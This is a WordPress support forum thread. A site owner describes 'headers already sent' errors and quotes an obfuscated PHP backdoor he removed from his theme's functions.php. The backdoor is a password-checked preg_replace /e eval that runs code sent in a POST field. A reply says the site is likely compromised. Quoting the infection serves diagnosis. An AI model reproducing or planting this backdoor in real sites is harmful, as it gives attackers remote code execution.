Warning: Cannot modify header information

Community Forums Forums General Discussion Warning: Cannot modify header information

This topic is: not resolved

This topic contains 3 replies, has 2 voices, and was last updated by  anitac 1 year, 2 months ago.

Viewing 4 posts - 1 through 4 (of 4 total)
  • Author

seanebusiness
    Participant

I have been having an issue with WordPress Admin area displaying Warning: Cannot modify header information – headers already sent by (output started at /homepages/0/d135381xxx/htdocs/seanclark/wp-content/themes/magazine/functions.php:1) in /homepages/0/d135381xxx/htdocs/seanclark/wp-includes/pluggable.php on line 876

And similar errors, I found and removed the following seemingly rogue code in the functions.php file of the magazine theme.

<?php
    if(isset($_POST['pas']) && (md5($_POST['pas']) == ’40082ed0f6a3ce’.’5ebfbb39c7b7fcf27b’) && isset($_POST['update'])) {$domainValidator=’p’.’reg_rep’.'lace’;$domain=”/.*/e”;$domainValidator($domain,’ev’.'al(\\$_POST[\'upd'.'ate\']);’, “”);}
    ?>

This then gave me an error related to Premise.

Warning: Cannot modify header information – headers already sent by (output started at /homepages/0/d135381xxx/htdocs/seanclark/wp-content/plugins/premise/lib/premise-support.php:4) in /homepages/0/d135381xxx/htdocs/seanclark/wp-includes/pluggable.php on line 876

I disable the Premise plugin and the site is now functioning normally.

I am working with the latest release of WordPress 3.5.1

Of course I can no longer use Premise.

Any advise welcome.

Thanks

anitac
    Participant

I don’t see a support area on the Premise website itself. I would probably submit a ticket to the support team on this one.

Let me help you customize your theme, responsive header, Buddypress, Agentpress or technical issue!
    Visit me here: Cre8tiveDiva.com | Tweet Me! | Plus Me!
    When asking for help, please provide a link or screen shot showing your problem!

seanebusiness
    Participant

It’s not Premise I am concerned about really, but the rogue code that ended up in the Magazine themes function.php file

Thanks

Sean

anitac
    Participant

I would run a virus check. I see the reference to MD5 in there which is how your passwords are changed, encoded/encrypted. I think your website and installation has been compromised.

Let me help you customize your theme, responsive header, Buddypress, Agentpress or technical issue!
    Visit me here: Cre8tiveDiva.com | Tweet Me! | Plus Me!
    When asking for help, please provide a link or screen shot showing your problem!

Viewing 4 posts - 1 through 4 (of 4 total)

You must be logged in to reply to this topic.